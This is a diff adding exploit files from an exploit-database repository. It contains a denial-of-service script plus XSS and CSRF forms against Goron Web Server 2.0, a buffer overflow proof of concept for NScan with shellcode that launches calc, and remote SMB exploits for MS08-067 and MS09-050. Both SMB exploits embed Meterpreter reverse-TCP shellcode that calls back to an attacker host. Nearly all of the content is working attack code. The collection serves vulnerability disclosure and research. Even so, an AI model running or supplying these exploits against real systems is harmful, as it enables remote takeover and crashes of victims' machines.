my $req = HTTP::Request->new( GET => $link );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($req);
return $response->content;
}
# milw0rm.com [2009-07-24]

133
platforms/windows/dos/40298.py Executable file
View file

@ -0,0 +1,133 @@
"""
# Exploit Title: Goron Web Server 2.0 - Multiple Vulnerabilities
# Date: 26/08/2016
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: https://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: https://sourceforge.net/projects/goron/
# Software Link: http://master.dl.sourceforge.net/project/goron/goron/goron2.0/GoronWin32.zip
# Version: 2.0
# Tested on: Windows 7 Family x64 (FR)
# Category: webapps
Disclosure Timeline:
--------------------
2016-08-15: Vulnerabilities discovered
2016-08-23: Developper contacted via Twitter
2016-08-24: Developper contacted me back
2016-08-25: Developper informed me that Goron is no longer maintained (EOL)
2016-08-26: Exploits published
Description :
-------------
Multiple vulnerabilities exist in Goron Web Server 2.0 for Windows. They allow an attacker to remotely DoS the server, or to abuse XSS or CSRF flaws by
sending a crafted email to the web server administrator.
[VULNERABILITY 1/3]: REMOTE DENIAL OF SERVICE (DOS)
___________________________________________________________________________________________________________
By connecting multiple times to the web server and sending long packets, it is possible to crash the server.
Below is an example of a working python exploit.
"""
#!/usr/bin/python
import socket, time
host = "192.168.241.130"
port = 80
junk = '\x41' * 100000
buffer = "GET " + junk + " HTTP/1.1\r\n"
buffer += "\r\n"
print "\nExploit Title : Goron 2.0 - Denial of Service"
print "Exploit Author : @gkweb76\n"
try:
print "[*] Connecting to %s:%d" % (host, port)
for count in range(100000):
print "[*] Sending buffer... (%d)" % count
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host, port))
except:
time.sleep(1)
s.connect((host, port))
s.send(buffer)
s.close()
print "[-] Goron not crashed?"
except:
print "\n[*] Goron Web Server seems crashed!"
"""
[VULNERABILITY 2/3]: WEBMIN.RB AND CONFIG.RB CROSS SITE SCRIPTING (XSS)
___________________________________________________________________________________________________________
The webmin.rb and config.rb files are both vulnerable to XSS in various parameters.
Config.rb can be abused directly with a GET request via the 'node' parameter like below:"""
GET http://remote_host/config.rb?node=<script>alert('XSS here')</script> HTTP/1.1
"""It should be noted that config.rb is accessible by default, and allows to retrieve in plain text the admin password of webmin.rb if one has been set.
It should be considered a default configuration password disclosure vulnerability in itself, but it is one of the purpose of this page to display the
server's configuration, including password. Config.rb should thus be restricted, which is not the case on the default install:"""
GET http://remote_host/config.rb?node=Root/System/MainPassword HTTP/1.1
"""
Webmin.rb by default is not password protected, but a password can be set to enforce an HTTP BASIC authentication. Webmin.rb panel enables the
administrator to stop/restart the server, display logs, change password, etc... Each request action is in the following form:"""
POST http://remote_host/webmin.rb HTTP/1.1
data: action=<action here>
"""
This 'data' parameter is compared to a list of allowed actions such as 'StopServer' or 'ShowGUI'. If the action is unknown, the web page is rebuilt and
displays the action parameter content on the top of the page without sanitation, allowing XSS:"""
POST http://remote_host/webmin.rb HTTP/1.1
data: action=<script>alert('XSS here')</script>
"The form below allows to exploit this XSS:"
<html><body>
<form method="post" action="http://remote_host/webmin.rb">
<input type="hidden" name="action" value="<script>alert('XSS here')</script>"/>
<input value="Click Here!" type="submit">
</form>
<script>
document.forms[0].submit();
</script>
</body></html>
"""
[VULNERABILITY 3/3]: WEBMIN.RB CROSS SITE REQUEST FORGERY (CSRF)
___________________________________________________________________________________________________________
The webmin.rb does not have CSRF protection. This allows an attacker to send a crafted email to do any action the webmin page allows to,
such as modifying admin password as below:"""
POST http://192.168.241.130/webmin.rb HTTP/1.1
data: action=SetPassword
data: newPassword=mypassword
"The form below allows to exploit this CSRF:"
<html><body>
<form method="post" action="http://remote_host/webmin.rb">
<input type="hidden" name="action" value="SetPassword"/>
<input type="hidden" name="newPassword" value="mypassword"/>
<input value="Click Here!" type="submit">
</form>
<script>
document.forms[0].submit();
</script>
</body></html>

148
platforms/windows/local/40297.py Executable file
View file

@ -0,0 +1,148 @@
'''
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NECROSCAN-BUFFER-OVERFLOW.txt
[+] ISR: ApparitionSec
Vendor:
===================
nscan.hypermart.net
Product:
======================================
NECROSOFT NScan version <= v0.9.1
ver 0.666 build 13
circa 1999
NScan is one of the most fast and flexible portscanners for Windows. It is specially designed for scanning large networks and gathering
related network/host information. It supports remote monitoring, usage of host and port lists, option profiles, speed and accuracy tuning,
etc. It also contains a traceroute, dig and whois, which work together with scanner.
Vulnerability Type:
================
Buffer Overflow
Vulnerability Details:
=====================
dig.exe is a component of Necroscan 'nscan.exe' that performs DNS lookups, this component has a trivial buffer overflow vulnerability.
1,001 bytes direct EIP overwrite our shellcode will be sitting at ESP register.
Important we need \x2E\x2E in the shellcode! WinExec(calc.exe) as once it is injected it gets converted to an unusable character and will fail
to execute. However, we can bypass this by double padding our shellcode \x2E\x2E instead of a single \x2E now it will Execute!
payload="A"*997+"RRRR" <===== EIP is here
1) use mona or findjmp.exe to get suitable JMP ESP register
2) run python script below to generate exploit payload
3) paste payload into DNS lookup 'Target' input field
4) Click 'TCP lookup' button
5) BOOM see calc.exe run!
Stack dump...
EAX 00000021
ECX 2D680000
EDX 01C9E8B8
EBX 756EFA00 kernel32.756EFA00
ESP 036BFEE0 ASCII "calc"
EBP 756C2C51 kernel32.WinExec
ESI 002D4A78
EDI 756EFA28 kernel32.756EFA28
EIP 036BFF58
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 1 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFD7000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_NO_MORE_FILES (00000012)
EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
Exploit code(s):
===============
'''
import struct
#Author: hyp3rlinx
#ISR: ApparitionSec
#Site: hyp3rlinx.altervista.org
#================================
#Necroscan nscan.exe Local Buffer Overflow POC
#dig.exe is a component of Necroscan that does DNS lookups
#this component has a trivial buffer overflow vulnerability.
#payload="A"*1001 #EIP is here
#paste generated exploit into DNS lookup 'Target' input field
#Click 'TCP lookup' button
#BOOM!
#Important need .. \x2E\x2E in the shellcode! (calc.exe)
#Tested successfully Windows 7 SP1
#No suitable JMP register in the vulnerable program, they contain null bytes, have use !mona jmp -r esp
#plugin or findjmp.exe.
rp=struct.pack("<L", 0x75658BD5) #JMP ESP kernel32
# Modified 'calc.exe' shellcode Windows 7 SP1 for this exploit
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x2E\x65\x78\x65" #<=== \x2E\x2E (Deal with "." character problem)
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
payload="A"*997+rp+"\x90"*10+sc
file=open("NECRO", "w")
file.write(payload)
file.close()
print '=== Exploit payload created! ==='
print '=== HYP3RLINX | APPARITIONsec ==='
'''
Exploitation Technique:
=======================
Local
Severity Level:
================
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
'''

224
platforms/windows/remote/40279.py Executable file
View file

@ -0,0 +1,224 @@
# EDB-Note: Source ~ https://raw.githubusercontent.com/ohnozzy/Exploit/master/MS08_067.py
import struct
import time
import sys
from threading import Thread #Thread is imported incase you would like to modify
try:
from impacket import smb
from impacket import uuid
from impacket.dcerpc import dcerpc
from impacket.dcerpc import transport
except ImportError, _:
print 'Install the following library to make this script work'
print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
sys.exit(1)
print '#######################################################################'
print '# MS08-067 Exploit'
print '# This is a modified verion of Debasis Mohanty\'s code (https://www.exploit-db.com/exploits/7132/).
print '# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi'
print '#######################################################################\n'
#Reverse TCP shellcode from metasploit; port 443 IP 192.168.40.103; badchars \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40;
#Make sure there are enough nops at the begining for the decoder to work. Payload size: 380 bytes (nopsleps are not included)
#EXITFUNC=thread Important!
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.77 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python
shellcode="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += "\x2b\xc9\x83\xe9\xa7\xe8\xff\xff\xff\xff\xc0\x5e\x81"
shellcode += "\x76\x0e\xb7\xdd\x9e\xe0\x83\xee\xfc\xe2\xf4\x4b\x35"
shellcode += "\x1c\xe0\xb7\xdd\xfe\x69\x52\xec\x5e\x84\x3c\x8d\xae"
shellcode += "\x6b\xe5\xd1\x15\xb2\xa3\x56\xec\xc8\xb8\x6a\xd4\xc6"
shellcode += "\x86\x22\x32\xdc\xd6\xa1\x9c\xcc\x97\x1c\x51\xed\xb6"
shellcode += "\x1a\x7c\x12\xe5\x8a\x15\xb2\xa7\x56\xd4\xdc\x3c\x91"
shellcode += "\x8f\x98\x54\x95\x9f\x31\xe6\x56\xc7\xc0\xb6\x0e\x15"
shellcode += "\xa9\xaf\x3e\xa4\xa9\x3c\xe9\x15\xe1\x61\xec\x61\x4c"
shellcode += "\x76\x12\x93\xe1\x70\xe5\x7e\x95\x41\xde\xe3\x18\x8c"
shellcode += "\xa0\xba\x95\x53\x85\x15\xb8\x93\xdc\x4d\x86\x3c\xd1"
shellcode += "\xd5\x6b\xef\xc1\x9f\x33\x3c\xd9\x15\xe1\x67\x54\xda"
shellcode += "\xc4\x93\x86\xc5\x81\xee\x87\xcf\x1f\x57\x82\xc1\xba"
shellcode += "\x3c\xcf\x75\x6d\xea\xb5\xad\xd2\xb7\xdd\xf6\x97\xc4"
shellcode += "\xef\xc1\xb4\xdf\x91\xe9\xc6\xb0\x22\x4b\x58\x27\xdc"
shellcode += "\x9e\xe0\x9e\x19\xca\xb0\xdf\xf4\x1e\x8b\xb7\x22\x4b"
shellcode += "\x8a\xb2\xb5\x5e\x48\xa9\x90\xf6\xe2\xb7\xdc\x25\x69"
shellcode += "\x51\x8d\xce\xb0\xe7\x9d\xce\xa0\xe7\xb5\x74\xef\x68"
shellcode += "\x3d\x61\x35\x20\xb7\x8e\xb6\xe0\xb5\x07\x45\xc3\xbc"
shellcode += "\x61\x35\x32\x1d\xea\xea\x48\x93\x96\x95\x5b\x35\xff"
shellcode += "\xe0\xb7\xdd\xf4\xe0\xdd\xd9\xc8\xb7\xdf\xdf\x47\x28"
shellcode += "\xe8\x22\x4b\x63\x4f\xdd\xe0\xd6\x3c\xeb\xf4\xa0\xdf"
shellcode += "\xdd\x8e\xe0\xb7\x8b\xf4\xe0\xdf\x85\x3a\xb3\x52\x22"
shellcode += "\x4b\x73\xe4\xb7\x9e\xb6\xe4\x8a\xf6\xe2\x6e\x15\xc1"
shellcode += "\x1f\x62\x5e\x66\xe0\xca\xff\xc6\x88\xb7\x9d\x9e\xe0"
shellcode += "\xdd\xdd\xce\x88\xbc\xf2\x91\xd0\x48\x08\xc9\x88\xc2"
shellcode += "\xb3\xd3\x81\x48\x08\xc0\xbe\x48\xd1\xba\x09\xc6\x22"
shellcode += "\x61\x1f\xb6\x1e\xb7\x26\xc2\x1a\x5d\x5b\x57\xc0\xb4"
shellcode += "\xea\xdf\x7b\x0b\x5d\x2a\x22\x4b\xdc\xb1\xa1\x94\x60"
shellcode += "\x4c\x3d\xeb\xe5\x0c\x9a\x8d\x92\xd8\xb7\x9e\xb3\x48"
shellcode += "\x08\x9e\xe0"
nonxjmper = "\x08\x04\x02\x00%s"+"A"*4+"%s"+"A"*42+"\x90"*8+"\xeb\x62"+"A"*10
disableNXjumper = "\x08\x04\x02\x00%s%s%s"+"A"*28+"%s"+"\xeb\x02"+"\x90"*2+"\xeb\x62"
ropjumper = "\x00\x08\x01\x00"+"%s"+"\x10\x01\x04\x01";
module_base = 0x6f880000
def generate_rop(rvas):
gadget1="\x90\x5a\x59\xc3"
gadget2 = ["\x90\x89\xc7\x83", "\xc7\x0c\x6a\x7f", "\x59\xf2\xa5\x90"]
gadget3="\xcc\x90\xeb\x5a"
ret=struct.pack('<L', 0x00018000)
ret+=struct.pack('<L', rvas['call_HeapCreate']+module_base)
ret+=struct.pack('<L', 0x01040110)
ret+=struct.pack('<L', 0x01010101)
ret+=struct.pack('<L', 0x01010101)
ret+=struct.pack('<L', rvas['add eax, ebp / mov ecx, 0x59ffffa8 / ret']+module_base)
ret+=struct.pack('<L', rvas['pop ecx / ret']+module_base)
ret+=gadget1
ret+=struct.pack('<L', rvas['mov [eax], ecx / ret']+module_base)
ret+=struct.pack('<L', rvas['jmp eax']+module_base)
ret+=gadget2[0]
ret+=gadget2[1]
ret+=struct.pack('<L', rvas['mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret']+module_base)
ret+=struct.pack('<L', rvas['pop ecx / ret']+module_base)
ret+=gadget2[2]
ret+=struct.pack('<L', rvas['mov [eax+0x10], ecx / ret']+module_base)
ret+=struct.pack('<L', rvas['add eax, 8 / ret']+module_base)
ret+=struct.pack('<L', rvas['jmp eax']+module_base)
ret+=gadget3
return ret
class SRVSVC_Exploit(Thread):
def __init__(self, target, os, port=445):
super(SRVSVC_Exploit, self).__init__()
self.__port = port
self.target = target
self.os = os
def __DCEPacket(self):
if (self.os=='1'):
print 'Windows XP SP0/SP1 Universal\n'
ret = "\x61\x13\x00\x01"
jumper = nonxjmper % (ret, ret)
elif (self.os=='2'):
print 'Windows 2000 Universal\n'
ret = "\xb0\x1c\x1f\x00"
jumper = nonxjmper % (ret, ret)
elif (self.os=='3'):
print 'Windows 2003 SP0 Universal\n'
ret = "\x9e\x12\x00\x01" #0x01 00 12 9e
jumper = nonxjmper % (ret, ret)
elif (self.os=='4'):
print 'Windows 2003 SP1 English\n'
ret_dec = "\x8c\x56\x90\x7c" #0x7c 90 56 8c dec ESI, ret @SHELL32.DLL
ret_pop = "\xf4\x7c\xa2\x7c" #0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL
jmp_esp = "\xd3\xfe\x86\x7c" #0x 7c 86 fe d3 jmp ESP @NTDLL.DLL
disable_nx = "\x13\xe4\x83\x7c" #0x 7c 83 e4 13 NX disable @NTDLL.DLL
jumper = disableNXjumper % (ret_dec*6, ret_pop, disable_nx, jmp_esp*2)
elif (self.os=='5'):
print 'Windows XP SP3 French (NX)\n'
ret = "\x07\xf8\x5b\x59" #0x59 5b f8 07
disable_nx = "\xc2\x17\x5c\x59" #0x59 5c 17 c2
jumper = nonxjmper % (disable_nx, ret) #the nonxjmper also work in this case.
elif (self.os=='6'):
print 'Windows XP SP3 English (NX)\n'
ret = "\x07\xf8\x88\x6f" #0x6f 88 f8 07
disable_nx = "\xc2\x17\x89\x6f" #0x6f 89 17 c2
jumper = nonxjmper % (disable_nx, ret) #the nonxjmper also work in this case.
elif (self.os=='7'):
print 'Windows XP SP3 English (AlwaysOn NX)\n'
rvasets = {'call_HeapCreate': 0x21286,'add eax, ebp / mov ecx, 0x59ffffa8 / ret' : 0x2e796,'pop ecx / ret':0x2e796 + 6,'mov [eax], ecx / ret':0xd296,'jmp eax':0x19c6f,'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret':0x10a56,'mov [eax+0x10], ecx / ret':0x10a56 + 6,'add eax, 8 / ret':0x29c64}
jumper = generate_rop(rvasets)+"AB" #the nonxjmper also work in this case.
else:
print 'Not supported OS version\n'
sys.exit(-1)
print '[-]Initiating connection'
self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
self.__trans.connect()
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
self.__dce = self.__trans.DCERPC_class(self.__trans)
self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
path ="\x5c\x00"+"ABCDEFGHIJ"*10 + shellcode +"\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" + "\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00" + jumper + "\x00" * 2
server="\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00"
prefix="\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00"
self.__stub=server+"\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01\x00\x00" + path +"\xE8\x03\x00\x00"+prefix+"\x01\x10\x00\x00\x00\x00\x00\x00"
return
def run(self):
self.__DCEPacket()
self.__dce.call(0x1f, self.__stub)
time.sleep(5)
print 'Exploit finish\n'
if __name__ == '__main__':
try:
target = sys.argv[1]
os = sys.argv[2]
except IndexError:
print '\nUsage: %s <target ip>\n' % sys.argv[0]
print 'Example: MS08_067.py 192.168.1.1 1 for Windows XP SP0/SP1 Universal\n'
print 'Example: MS08_067.py 192.168.1.1 2 for Windows 2000 Universal\n'
sys.exit(-1)
current = SRVSVC_Exploit(target, os)
current.start()

110
platforms/windows/remote/40280.py Executable file
View file

@ -0,0 +1,110 @@
# EDB-Note: Source ~ https://raw.githubusercontent.com/ohnozzy/Exploit/master/MS09_050.py
#!/usr/bin/python
#This module depends on the linux command line program smbclient.
#I can't find a python smb library for smb login. If you can find one, you can replace that part of the code with the smb login function in python.
#The idea is that after the evil payload is injected by the first packet, it need to be trigger by an authentication event. Whether the authentication successes or not does not matter.
import tempfile
import sys
import subprocess
from socket import socket
from time import sleep
from smb.SMBConnection import SMBConnection
try:
target = sys.argv[1]
except IndexError:
print '\nUsage: %s <target ip>\n' % sys.argv[0]
print 'Example: MS36299.py 192.168.1.1 1\n'
sys.exit(-1)
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.77 LPORT=443 EXITFUNC=thread -f python
shell = ""
shell += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" #fce8820000006089e531c0648b
shell += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
shell += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
shell += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
shell += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
shell += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
shell += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
shell += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
shell += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
shell += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
shell += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
shell += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
shell += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
shell += "\xff\xd5\x6a\x05\x68\xc0\xa8\x1e\x4d\x68\x02\x00\x01"
shell += "\xbb\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
shell += "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
shell += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"
shell += "\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"
shell += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a"
shell += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
shell += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
shell += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40"
shell += "\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57"
shell += "\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9"
shell += "\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xe0"
shell += "\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"
shell += "\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00"
shell += "\x53\xff\xd5"
host = target, 445
buff ="\x00\x00\x03\x9e\xff\x53\x4d\x42"
buff+="\x72\x00\x00\x00\x00\x18\x53\xc8"
buff+="\x17\x02" #high process ID
buff+="\x00\xe9\x58\x01\x00\x00"
buff+="\x00\x00\x00\x00\x00\x00\x00\x00"
buff+="\x00\x00\xfe\xda\x00\x7b\x03\x02"
buff+="\x04\x0d\xdf\xff"*25
buff+="\x00\x02\x53\x4d"
buff+="\x42\x20\x32\x2e\x30\x30\x32\x00"
buff+="\x00\x00\x00\x00"*37
buff+="\xff\xff\xff\xff"*2
buff+="\x42\x42\x42\x42"*7
buff+="\xb4\xff\xff\x3f" #magic index
buff+="\x41\x41\x41\x41"*6
buff+="\x09\x0d\xd0\xff" #return address
#stager_sysenter_hook from metasploit
buff+="\xfc\xfa\xeb\x1e\x5e\x68\x76\x01"
buff+="\x00\x00\x59\x0f\x32\x89\x46\x5d"
buff+="\x8b\x7e\x61\x89\xf8\x0f\x30\xb9"
buff+="\x16\x02\x00\x00\xf3\xa4\xfb\xf4"
buff+="\xeb\xfd\xe8\xdd\xff\xff\xff\x6a"
buff+="\x00\x9c\x60\xe8\x00\x00\x00\x00"
buff+="\x58\x8b\x58\x54\x89\x5c\x24\x24"
buff+="\x81\xf9\xde\xc0\xad\xde\x75\x10"
buff+="\x68\x76\x01\x00\x00\x59\x89\xd8"
buff+="\x31\xd2\x0f\x30\x31\xc0\xeb\x31"
buff+="\x8b\x32\x0f\xb6\x1e\x66\x81\xfb"
buff+="\xc3\x00\x75\x25\x8b\x58\x5c\x8d"
buff+="\x5b\x69\x89\x1a\xb8\x01\x00\x00"
buff+="\x80\x0f\xa2\x81\xe2\x00\x00\x10"
buff+="\x00\x74\x0e\xba\x00\xff\x3f\xc0"
buff+="\x83\xc2\x04\x81\x22\xff\xff\xff"
buff+="\x7f\x61\x9d\xc3\xff\xff\xff\xff"
buff+="\x00\x04\xdf\xff\x00\x04\xfe\x7f"
buff+="\x60\x6a\x30\x58\x99\x64\x8b\x18"
buff+="\x39\x53\x0c\x74\x2b\x8b\x43\x10"
buff+="\x8b\x40\x3c\x83\xc0\x28\x8b\x08"
buff+="\x03\x48\x03\x81\xf9\x6c\x61\x73"
buff+="\x73\x75\x15\xe8\x07\x00\x00\x00"
buff+="\xe8\x0d\x00\x00\x00\xeb\x09\xb9"
buff+="\xde\xc0\xad\xde\x89\xe2\x0f\x34"
buff+="\x61\xc3\x81\xc4\x54\xf2\xff\xff"
buff+=shell
s = socket()
s.connect(host)
s.send(buff)
s.close()
#Trigger the above injected code via authenticated process.
subprocess.call("echo '1223456' | rpcclient -U Administrator %s"%(target), shell=True)